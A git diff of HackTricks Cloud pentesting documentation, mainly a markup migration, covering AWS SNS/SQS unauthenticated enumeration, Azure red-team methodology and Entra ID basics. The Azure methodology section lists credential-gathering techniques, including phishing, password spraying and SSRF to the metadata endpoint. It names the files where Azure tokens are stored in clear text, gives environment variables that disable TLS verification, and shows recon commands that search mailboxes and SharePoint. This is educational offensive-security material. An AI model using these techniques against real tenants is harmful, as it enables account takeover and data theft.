-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md new file mode 100644 index 000000000..b97f36c13 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md @@ -0,0 +1,21 @@ +# AWS - SNS Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## SNS + +For more information about SNS check: + +{{#ref}} +../aws-services/aws-sns-enum.md +{{#endref}} + +### Open to All + +When you configure a SNS topic from the web console it's possible to indicate that **Everyone can publish and subscribe** to the topic: + +
+ +So if you **find the ARN of topics** inside the account (or brute forcing potential names for topics) you can **check** if you can **publish** or **subscribe** to **them**. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md new file mode 100644 index 000000000..2bd20c8a4 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md @@ -0,0 +1,23 @@ +# AWS - SQS Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## SQS + +For more information about SQS check: + +{{#ref}} +../aws-services/aws-sqs-and-sns-enum.md +{{#endref}} + +### Public URL template + +``` +https://sqs.[region].amazonaws.com/[account-id]/{user_provided} +``` + +### Check Permissions + +It's possible to misconfigure a SQS queue policy and grant permissions to everyone in AWS to send and receive messages, so if you get the ARN of queues try if you can access them. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/README.md b/src/pentesting-cloud/azure-security/README.md similarity index 68% rename from pentesting-cloud/azure-security/README.md rename to src/pentesting-cloud/azure-security/README.md index 02a5e0856..4e36070da 100644 --- a/pentesting-cloud/azure-security/README.md +++ b/src/pentesting-cloud/azure-security/README.md @@ -1,25 +1,12 @@ # Azure Pentesting -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## Basic Information -{% content-ref url="az-basic-information/" %} -[az-basic-information](az-basic-information/) -{% endcontent-ref %} +{{#ref}} +az-basic-information/ +{{#endref}} ## Azure Pentester/Red Team Methodology 
@@ -27,94 +14,98 @@ In order to audit an AZURE environment it's very important to know: which **serv From a Red Team point of view, the **first step to compromise an Azure environment** is to manage to obtain some **credentials** for Azure AD. Here you have some ideas on how to do that: -* **Leaks** in github (or similar) - OSINT -* **Social** Engineering -* **Password** reuse (password leaks) -* Vulnerabilities in Azure-Hosted Applications - * [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint - * **Local File Read** - * `/home/USERNAME/.azure` - * `C:\Users\USERNAME\.azure` - * The file **`accessTokens.json`** in `az cli` before 2.30 - Jan2022 - stored **access tokens in clear text** - * The file **`azureProfile.json`** contains **info** about logged user. - * **`az logout`** removes the token. - * Older versions of **`Az PowerShell`** stored **access tokens** in **clear** text in **`TokenCache.dat`**. It also stores **ServicePrincipalSecret** in **clear**-text in **`AzureRmContext.json`**. The cmdlet **`Save-AzContext`** can be used to **store** **tokens**.\ +- **Leaks** in github (or similar) - OSINT +- **Social** Engineering +- **Password** reuse (password leaks) +- Vulnerabilities in Azure-Hosted Applications + - [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint + - **Local File Read** + - `/home/USERNAME/.azure` + - `C:\Users\USERNAME\.azure` + - The file **`accessTokens.json`** in `az cli` before 2.30 - Jan2022 - stored **access tokens in clear text** + - The file **`azureProfile.json`** contains **info** about logged user. + - **`az logout`** removes the token. + - Older versions of **`Az PowerShell`** stored **access tokens** in **clear** text in **`TokenCache.dat`**. 
It also stores **ServicePrincipalSecret** in **clear**-text in **`AzureRmContext.json`**. The cmdlet **`Save-AzContext`** can be used to **store** **tokens**.\ Use `Disconnect-AzAccount` to remove them. -* 3rd parties **breached** -* **Internal** Employee -* [**Common Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (credentials or Oauth App) - * [Device Code Authentication Phishing](az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md) -* [Azure **Password Spraying**](az-unauthenticated-enum-and-initial-entry/az-password-spraying.md) +- 3rd parties **breached** +- **Internal** Employee +- [**Common Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (credentials or Oauth App) + - [Device Code Authentication Phishing](az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md) +- [Azure **Password Spraying**](az-unauthenticated-enum-and-initial-entry/az-password-spraying.md) Even if you **haven't compromised any user** inside the Azure tenant you are attacking, you can **gather some information** from it: -{% content-ref url="az-unauthenticated-enum-and-initial-entry/" %} -[az-unauthenticated-enum-and-initial-entry](az-unauthenticated-enum-and-initial-entry/) -{% endcontent-ref %} +{{#ref}} +az-unauthenticated-enum-and-initial-entry/ +{{#endref}} -{% hint style="info" %} -After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration: -{% endhint %} +> [!NOTE] +> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration: ## Basic Enumeration -{% hint style="info" %} -Remember that the **noisiest** part of the enumeration is the **login**, not the enumeration itself. 
-{% endhint %} +> [!NOTE] +> Remember that the **noisiest** part of the enumeration is the **login**, not the enumeration itself. ### SSRF If you found a SSRF in a machine inside Azure check this page for tricks: -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %} +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf +{{#endref}} ### Bypass Login Conditions -
+
In cases where you have some valid credentials but you cannot login, these are some common protections that could be in place: -* **IP whitelisting** -- You need to compromise a valid IP -* **Geo restrictions** -- Find where the user lives or where are the offices of the company and get a IP from the same city (or contry at least) -* **Browser** -- Maybe only a browser from certain OS (Windows, Linux, Mac, Android, iOS) is allowed. Find out which OS the victim/company uses. -* You can also try to **compromise Service Principal credentials** as they usually are less limited and its login is less reviewed +- **IP whitelisting** -- You need to compromise a valid IP +- **Geo restrictions** -- Find where the user lives or where are the offices of the company and get a IP from the same city (or contry at least) +- **Browser** -- Maybe only a browser from certain OS (Windows, Linux, Mac, Android, iOS) is allowed. Find out which OS the victim/company uses. +- You can also try to **compromise Service Principal credentials** as they usually are less limited and its login is less reviewed After bypassing it, you might be able to get back to your initial setup and you will still have access. ### Subdomain Takeover -* [https://godiego.co/posts/STO-Azure/](https://godiego.co/posts/STO-Azure/) +- [https://godiego.co/posts/STO-Azure/](https://godiego.co/posts/STO-Azure/) ### Whoami -{% hint style="danger" %} -Learn **how to install** az cli, AzureAD and Az PowerShell in the [**Az - Entra ID**](az-services/az-azuread.md) section. -{% endhint %} +> [!CAUTION] +> Learn **how to install** az cli, AzureAD and Az PowerShell in the [**Az - Entra ID**](az-services/az-azuread.md) section. 
One of the first things you need to know is **who you are** (in which environment you are): -{% tabs %} -{% tab title="az cli" %} +{{#tabs }} +{{#tab name="az cli" }} + ```bash -az account list +az account list az account tenant list # Current tenant info az account subscription list # Current subscription info az ad signed-in-user show # Current signed-in user az ad signed-in-user list-owned-objects # Get owned objects by current user az account management-group list #Not allowed by default ``` -{% endtab %} -{% tab title="AzureAD" %} +{{#endtab }} + +{{#tab name="AzureAD" }} + ```powershell #Get the current session state Get-AzureADCurrentSessionInfo #Get details of the current tenant Get-AzureADTenantDetail ``` -{% endtab %} -{% tab title="Az PowerShell" %} +{{#endtab }} + +{{#tab name="Az PowerShell" }} + ```powershell # Get the information about the current context (Account, Tenant, Subscription etc.) Get-AzContext 
@@ -130,28 +121,27 @@ Get-AzResource Get-AzRoleAssignment # For all users Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com # For current user ``` -{% endtab %} -{% endtabs %} -{% hint style="danger" %} -Oone of the most important commands to enumerate Azure is **`Get-AzResource`** from Az PowerShell as it lets you **know the resources your current user has visibility over**. +{{#endtab }} +{{#endtabs }} -You can get the same info in the **web console** going to [https://portal.azure.com/#view/HubsExtension/BrowseAll](https://portal.azure.com/#view/HubsExtension/BrowseAll) or searching for "All resources" -{% endhint %} +> [!CAUTION] +> Oone of the most important commands to enumerate Azure is **`Get-AzResource`** from Az PowerShell as it lets you **know the resources your current user has visibility over**. +> +> You can get the same info in the **web console** going to [https://portal.azure.com/#view/HubsExtension/BrowseAll](https://portal.azure.com/#view/HubsExtension/BrowseAll) or searching for "All resources" ### ENtra ID Enumeration By default, any user should have **enough permissions to enumerate** things such us, users, groups, roles, service principals... (check [default AzureAD permissions](az-basic-information/#default-user-permissions)).\ You can find here a guide: -{% content-ref url="az-services/az-azuread.md" %} -[az-azuread.md](az-services/az-azuread.md) -{% endcontent-ref %} +{{#ref}} +az-services/az-azuread.md +{{#endref}} -{% hint style="info" %} -Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\ -In the following section you can check some ways to **enumerate some common services.** -{% endhint %} +> [!NOTE] +> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). 
It's time to figure out which services are being used in the environment.\ +> In the following section you can check some ways to **enumerate some common services.** ## App Service SCM @@ -175,8 +165,9 @@ az account management-group list --output table --debug In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do: -{% tabs %} -{% tab title="Bash" %} +{{#tabs }} +{{#tab name="Bash" }} + ```bash export ADAL_PYTHON_SSL_NO_VERIFY=1 export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1 @@ -189,17 +180,20 @@ export HTTP_PROXY="http://127.0.0.1:8080" openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem ``` -{% endtab %} -{% tab title="PS" %} +{{#endtab }} + +{{#tab name="PS" }} + ```bash $env:ADAL_PYTHON_SSL_NO_VERIFY=1 $env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1 $env:HTTPS_PROXY="http://127.0.0.1:8080" $env:HTTP_PROXY="http://127.0.0.1:8080" ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} ## Automated Recon Tools @@ -215,7 +209,6 @@ roadrecon gui ### [Monkey365](https://github.com/silverhack/monkey365) -{% code overflow="wrap" %} ```powershell Import-Module monkey365 Get-Help Invoke-Monkey365 @@ -223,7 +216,6 @@ Get-Help Invoke-Monkey365 -Detailed Invoke-Monkey365 -IncludeEntraID -ExportTo HTML -Verbose -Debug -InformationAction Continue Invoke-Monkey365 - Instance Azure -Analysis All -ExportTo HTML ``` -{% endcode %} ### [**Stormspotter**](https://github.com/Azure/Stormspotter) 
@@ -400,24 +392,11 @@ Invoke-GraphOpenInboxFinder -Tokens $tokens -Userlist users.txt #Get-TenantID #This module attempts to gather a tenant ID associated with a domain. -Get-TenantID -Domain +Get-TenantID -Domain #Invoke-GraphRunner #Runs Invoke-GraphRecon, Get-AzureADUsers, Get-SecurityGroups, Invoke-DumpCAPS, Invoke-DumpApps, and then uses the default_detectors.json file to search with Invoke-SearchMailbox, Invoke-SearchSharePointAndOneDrive, and Invoke-SearchTeams. Invoke-GraphRunner -Tokens $tokens ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-basic-information/README.md b/src/pentesting-cloud/azure-security/az-basic-information/README.md similarity index 65% rename from pentesting-cloud/azure-security/az-basic-information/README.md rename to src/pentesting-cloud/azure-security/az-basic-information/README.md index 003c4ae03..483d357bd 100644 --- a/pentesting-cloud/azure-security/az-basic-information/README.md +++ b/src/pentesting-cloud/azure-security/az-basic-information/README.md @@ -1,19 +1,6 @@ # Az - Basic Information -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Organization Hierarchy @@ -21,23 +8,23 @@ Learn & practice GCP Hacking:

https://td-mainsite-cdn.tutorialsdojo.com/wp-content/uploads/2023/02/managementgroups-768x474.png

+

https://td-mainsite-cdn.tutorialsdojo.com/wp-content/uploads/2023/02/managementgroups-768x474.png

### Azure Subscriptions -* It’s another **logical container where resources** (VMs, DBs…) can be run and will be billed. -* Its **parent** is always a **management group** (and it can be the root management group) as subscriptions cannot contain other subscriptions. -* It **trust only one Entra ID** directory -* **Permissions** applied at the subscription level (or any of its parents) are **inherited** to all the resources inside the subscription +- It’s another **logical container where resources** (VMs, DBs…) can be run and will be billed. +- Its **parent** is always a **management group** (and it can be the root management group) as subscriptions cannot contain other subscriptions. +- It **trust only one Entra ID** directory +- **Permissions** applied at the subscription level (or any of its parents) are **inherited** to all the resources inside the subscription ### Resource Groups @@ -53,11 +40,11 @@ Every resource in Azure has an Azure Resource ID that identifies it. The format of an Azure Resource ID is as follows: -* `/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}` +- `/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}` For a virtual machine named myVM in a resource group `myResourceGroup` under subscription ID `12345678-1234-1234-1234-123456789012`, the Azure Resource ID looks like this: -* `/subscriptions/12345678-1234-1234-1234-123456789012/resourceGroups/myResourceGroup/providers/Microsoft.Compute/virtualMachines/myVM` +- `/subscriptions/12345678-1234-1234-1234-123456789012/resourceGroups/myResourceGroup/providers/Microsoft.Compute/virtualMachines/myVM` ## Azure vs Entra ID vs Azure AD Domain Services 
@@ -77,74 +64,72 @@ Entra Domain Services extends the capabilities of Entra ID by offering **managed ### Users -* **New users** - * Indicate email name and domain from selected tenant - * Indicate Display name - * Indicate password - * Indicate properties (first name, job title, contact info…) - * Default user type is “**member**” -* **External users** - * Indicate email to invite and display name (can be a non Microsft email) - * Indicate properties - * Default user type is “**Guest**” +- **New users** + - Indicate email name and domain from selected tenant + - Indicate Display name + - Indicate password + - Indicate properties (first name, job title, contact info…) + - Default user type is “**member**” +- **External users** + - Indicate email to invite and display name (can be a non Microsft email) + - Indicate properties + - Default user type is “**Guest**” ### Members & Guests Default Permissions You can check them in [https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions](https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions) but among other actions a member will be able to: -* Read all users, Groups, Applications, Devices, Roles, Subscriptions, and their public properties -* Invite Guests (_can be turned off_) -* Create Security groups -* Read non-hidden Group memberships -* Add guests to Owned groups -* Create new application (_can be turned off_) -* Add up to 50 devices to Azure (_can be turned off_) +- Read all users, Groups, Applications, Devices, Roles, Subscriptions, and their public properties +- Invite Guests (_can be turned off_) +- Create Security groups +- Read non-hidden Group memberships +- Add guests to Owned groups +- Create new application (_can be turned off_) +- Add up to 50 devices to Azure (_can be turned off_) -{% hint style="info" %} -Remember that to enumerate Azure resources the user needs an explicit grant of the permission. 
-{% endhint %} +> [!NOTE] +> Remember that to enumerate Azure resources the user needs an explicit grant of the permission. ### Users Default Configurable Permissions -* **Members (**[**docs**](https://learn.microsoft.com/en-gb/entra/fundamentals/users-default-permissions#restrict-member-users-default-permissions)**)** - * Register Applications: Default **Yes** - * Restrict non-admin users from creating tenants: Default **No** - * Create security groups: Default **Yes** - * Restrict access to Microsoft Entra administration portal: Default **No** - * This doesn’t restrict API access to the portal (only web) - * Allow users to connect work or school account with LinkedIn: Default **Yes** - * Show keep user signed in: Default **Yes** - * Restrict users from recovering the BitLocker key(s) for their owned devices: Default No (check in Device Settings) - * Read other users: Default **Yes** (via Microsoft Graph) -* **Guests** - * **Guest user access restrictions** - * **Guest users have the same access as members** grants all member user permissions to guest users by default. - * **Guest users have limited access to properties and memberships of directory objects (default)** restricts guest access to only their own user profile by default. Access to other users and group information is no longer allowed. - * **Guest user access is restricted to properties and memberships of their own directory objects** is the most restrictive one. 
- * **Guests can invite** - * **Anyone in the organization can invite guest users including guests and non-admins (most inclusive) - Default** - * **Member users and users assigned to specific admin roles can invite guest users including guests with member permissions** - * **Only users assigned to specific admin roles can invite guest users** - * **No one in the organization can invite guest users including admins (most restrictive)** - * **External user leave**: Default **True** - * Allow external users to leave the organization +- **Members (**[**docs**](https://learn.microsoft.com/en-gb/entra/fundamentals/users-default-permissions#restrict-member-users-default-permissions)**)** + - Register Applications: Default **Yes** + - Restrict non-admin users from creating tenants: Default **No** + - Create security groups: Default **Yes** + - Restrict access to Microsoft Entra administration portal: Default **No** + - This doesn’t restrict API access to the portal (only web) + - Allow users to connect work or school account with LinkedIn: Default **Yes** + - Show keep user signed in: Default **Yes** + - Restrict users from recovering the BitLocker key(s) for their owned devices: Default No (check in Device Settings) + - Read other users: Default **Yes** (via Microsoft Graph) +- **Guests** + - **Guest user access restrictions** + - **Guest users have the same access as members** grants all member user permissions to guest users by default. + - **Guest users have limited access to properties and memberships of directory objects (default)** restricts guest access to only their own user profile by default. Access to other users and group information is no longer allowed. + - **Guest user access is restricted to properties and memberships of their own directory objects** is the most restrictive one. 
+ - **Guests can invite** + - **Anyone in the organization can invite guest users including guests and non-admins (most inclusive) - Default** + - **Member users and users assigned to specific admin roles can invite guest users including guests with member permissions** + - **Only users assigned to specific admin roles can invite guest users** + - **No one in the organization can invite guest users including admins (most restrictive)** + - **External user leave**: Default **True** + - Allow external users to leave the organization -{% hint style="success" %} -Even if restricted by default, users (members and guests) with granted permissions could perform the previous actions. -{% endhint %} +> [!TIP] +> Even if restricted by default, users (members and guests) with granted permissions could perform the previous actions. ### **Groups** There are **2 types of groups**: -* **Security**: This type of group is used to give members access to aplications, resources and assign licenses. Users, devices, service principals and other groups an be members. -* **Microsoft 365**: This type of group is used for collaboration, giving members access to a shared mailbox, calendar, files, SharePoint site, and so on. Group members can only be users. - * This will have an **email address** with the domain of the EntraID tenant. +- **Security**: This type of group is used to give members access to aplications, resources and assign licenses. Users, devices, service principals and other groups an be members. +- **Microsoft 365**: This type of group is used for collaboration, giving members access to a shared mailbox, calendar, files, SharePoint site, and so on. Group members can only be users. + - This will have an **email address** with the domain of the EntraID tenant. There are **2 types of memberships**: -* **Assigned**: Allow to manually add specific members to a group. 
-* **Dynamic membership**: Automatically manages membership using rules, updating group inclusion when members attributes change. +- **Assigned**: Allow to manually add specific members to a group. +- **Dynamic membership**: Automatically manages membership using rules, updating group inclusion when members attributes change. ### **Service Principals** @@ -152,8 +137,8 @@ A **Service Principal** is an **identity** created for **use** with **applicatio It's possible to **directly login as a service principal** by generating it a **secret** (password), a **certificate**, or granting **federated** access to third party platforms (e.g. Github Actions) over it. -* If you choose **password** auth (by default), **save the password generated** as you won't be able to access it again. -* If you choose certificate authentication, make sure the **application will have access over the private key**. +- If you choose **password** auth (by default), **save the password generated** as you won't be able to access it again. +- If you choose certificate authentication, make sure the **application will have access over the private key**. ### App Registrations 
@@ -174,24 +159,24 @@ An **App Registration** is a configuration that allows an application to integra **User consent for applications** -* **Do not allow user consent** - * An administrator will be required for all apps. -* **Allow user consent for apps from verified publishers, for selected permissions (Recommended)** - * All users can consent for permissions classified as "low impact", for apps from verified publishers or apps registered in this organization. - * **Default** low impact permissions (although you need to accept to add them as low): - * User.Read - sign in and read user profile - * offline\_access - maintain access to data that users have given it access to - * openid - sign users in - * profile - view user's basic profile - * email - view user's email address -* **Allow user consent for apps (Default)** - * All users can consent for any app to access the organization's data. +- **Do not allow user consent** + - An administrator will be required for all apps. +- **Allow user consent for apps from verified publishers, for selected permissions (Recommended)** + - All users can consent for permissions classified as "low impact", for apps from verified publishers or apps registered in this organization. + - **Default** low impact permissions (although you need to accept to add them as low): + - User.Read - sign in and read user profile + - offline_access - maintain access to data that users have given it access to + - openid - sign users in + - profile - view user's basic profile + - email - view user's email address +- **Allow user consent for apps (Default)** + - All users can consent for any app to access the organization's data. 
**Admin consent requests**: Default **No** -* Users can request admin consent to apps they are unable to consent to -* If **Yes**: It’s possible to indicate Users, Groups and Roles that can consent requests - * Configure also if users will receive email notifications and expiration reminders +- Users can request admin consent to apps they are unable to consent to +- If **Yes**: It’s possible to indicate Users, Groups and Roles that can consent requests + - Configure also if users will receive email notifications and expiration reminders ### **Managed Identity (Metadata)** 
@@ -199,8 +184,8 @@ Managed identities in Azure Active Directory offer a solution for **automaticall There are two types of managed identities: -* **System-assigned**. Some Azure services allow you to **enable a managed identity directly on a service instance**. When you enable a system-assigned managed identity, a **service principal** is created in the Entra ID tenant trusted by the subscription where the resource is located. When the **resource** is **deleted**, Azure automatically **deletes** the **identity** for you. -* **User-assigned**. It's also possible for users to generate managed identities. These are created inside a resource group inside a subscription and a service principal will be created in the EntraID trusted by the subscription. Then, you can assign the managed identity to one or **more instances** of an Azure service (multiple resources). For user-assigned managed identities, the **identity is managed separately from the resources that use it**. +- **System-assigned**. Some Azure services allow you to **enable a managed identity directly on a service instance**. When you enable a system-assigned managed identity, a **service principal** is created in the Entra ID tenant trusted by the subscription where the resource is located. When the **resource** is **deleted**, Azure automatically **deletes** the **identity** for you. +- **User-assigned**. It's also possible for users to generate managed identities. These are created inside a resource group inside a subscription and a service principal will be created in the EntraID trusted by the subscription. Then, you can assign the managed identity to one or **more instances** of an Azure service (multiple resources). For user-assigned managed identities, the **identity is managed separately from the resources that use it**. Managed Identities **don't generate eternal credentials** (like passwords or certificates) to access as the service principal attached to it. 
@@ -216,23 +201,23 @@ Administrative units allows to **give permissions from a role over a specific po Example: -* Scenario: A company wants regional IT admins to manage only the users in their own region. -* Implementation: - * Create Administrative Units for each region (e.g., "North America AU", "Europe AU"). - * Populate AUs with users from their respective regions. - * AUs can **contain users, groups, or devices** - * AUs support **dynamic memberships** - * AUs **cannot contain AUs** - * Assign Admin Roles: - * Grant the "User Administrator" role to regional IT staff, scoped to their region's AU. -* Outcome: Regional IT admins can manage user accounts within their region without affecting other regions. +- Scenario: A company wants regional IT admins to manage only the users in their own region. +- Implementation: + - Create Administrative Units for each region (e.g., "North America AU", "Europe AU"). + - Populate AUs with users from their respective regions. + - AUs can **contain users, groups, or devices** + - AUs support **dynamic memberships** + - AUs **cannot contain AUs** + - Assign Admin Roles: + - Grant the "User Administrator" role to regional IT staff, scoped to their region's AU. +- Outcome: Regional IT admins can manage user accounts within their region without affecting other regions. 
### Entra ID Roles -* In order to manage Entra ID there are some **built-in roles** that can be assigned to Entra ID principals to manage Entra ID - * Check the roles in [https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference) -* The most privileged role is **Global Administrator** -* In the Description of the role it’s possible to see its **granular permissions** +- In order to manage Entra ID there are some **built-in roles** that can be assigned to Entra ID principals to manage Entra ID + - Check the roles in [https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference) +- The most privileged role is **Global Administrator** +- In the Description of the role it’s possible to see its **granular permissions** ## Roles & Permissions 
@@ -262,70 +247,68 @@ Depending on the scope the role was assigned to, the **role** cold be **inherite This roles can **also be assigned over logic containers** (such as management groups, subscriptions and resource groups) and the principals affected will have them **over the resources inside those containers**. -* Find here a list with [**all the Azure built-in roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles). -* Find here a list with [**all the Entra ID built-in roles**](https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference). +- Find here a list with [**all the Azure built-in roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles). +- Find here a list with [**all the Entra ID built-in roles**](https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference). ### Custom Roles -* It’s also possible to create [**custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles) -* They are created inside a scope, although a role can be in several scopes (management groups, subscription and resource groups) -* It’s possible to configure all the granular permissions the custom role will have -* It’s possible to exclude permissions - * A principal with a excluded permission won’t be able to use it even if the permissions is being granted elsewhere -* It’s possible to use wildcards -* The used format is a JSON - * `actions` are for control actions over the resource - * `dataActions` are permissions over the data within the object +- It’s also possible to create [**custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles) +- They are created inside a scope, although a role can be in several scopes (management groups, subscription and resource groups) +- It’s possible to configure all the granular permissions the custom role will have +- It’s possible to exclude permissions + - 
A principal with a excluded permission won’t be able to use it even if the permissions is being granted elsewhere +- It’s possible to use wildcards +- The used format is a JSON + - `actions` are for control actions over the resource + - `dataActions` are permissions over the data within the object Example of permissions JSON for a custom role: ```json { - "properties": { - "roleName": "", - "description": "", - "assignableScopes": [ - "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f" + "properties": { + "roleName": "", + "description": "", + "assignableScopes": ["/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f"], + "permissions": [ + { + "actions": [ + "Microsoft.DigitalTwins/register/action", + "Microsoft.DigitalTwins/unregister/action", + "Microsoft.DigitalTwins/operations/read", + "Microsoft.DigitalTwins/digitalTwinsInstances/read", + "Microsoft.DigitalTwins/digitalTwinsInstances/write", + "Microsoft.CostManagement/exports/*" ], - "permissions": [ - { - "actions": [ - "Microsoft.DigitalTwins/register/action", - "Microsoft.DigitalTwins/unregister/action", - "Microsoft.DigitalTwins/operations/read", - "Microsoft.DigitalTwins/digitalTwinsInstances/read", - "Microsoft.DigitalTwins/digitalTwinsInstances/write", - "Microsoft.CostManagement/exports/*" - ], - "notActions": [ - "Astronomer.Astro/register/action", - "Astronomer.Astro/unregister/action", - "Astronomer.Astro/operations/read", - "Astronomer.Astro/organizations/read" - ], - "dataActions": [], - "notDataActions": [] - } - ] - } + "notActions": [ + "Astronomer.Astro/register/action", + "Astronomer.Astro/unregister/action", + "Astronomer.Astro/operations/read", + "Astronomer.Astro/organizations/read" + ], + "dataActions": [], + "notDataActions": [] + } + ] + } } ``` ### Permissions order -* In order for a **principal to have some access over a resource** he needs an explicit role being granted to him (anyhow) **granting him that permission**. 
-* An explicit **deny role assignment takes precedence** over the role granting the permission. +- In order for a **principal to have some access over a resource** he needs an explicit role being granted to him (anyhow) **granting him that permission**. +- An explicit **deny role assignment takes precedence** over the role granting the permission. -

https://link.springer.com/chapter/10.1007/978-1-4842-7325-8_10

+

https://link.springer.com/chapter/10.1007/978-1-4842-7325-8_10

### Global Administrator Global Administrator is a role from Entra ID that grants **complete control over the Entra ID tenant**. However, it doesn't grant any permissions over Azure resources by default. Users with the Global Administrator role has the ability to '**elevate' to User Access Administrator Azure role in the Root Management Group**. So Global Administrators can manage access in **all Azure subscriptions and management groups.**\ -This elevation can be done at the end of the page: [https://portal.azure.com/#view/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/\~/Properties](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties) +This elevation can be done at the end of the page: [https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/\~/Properties](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties) -
+
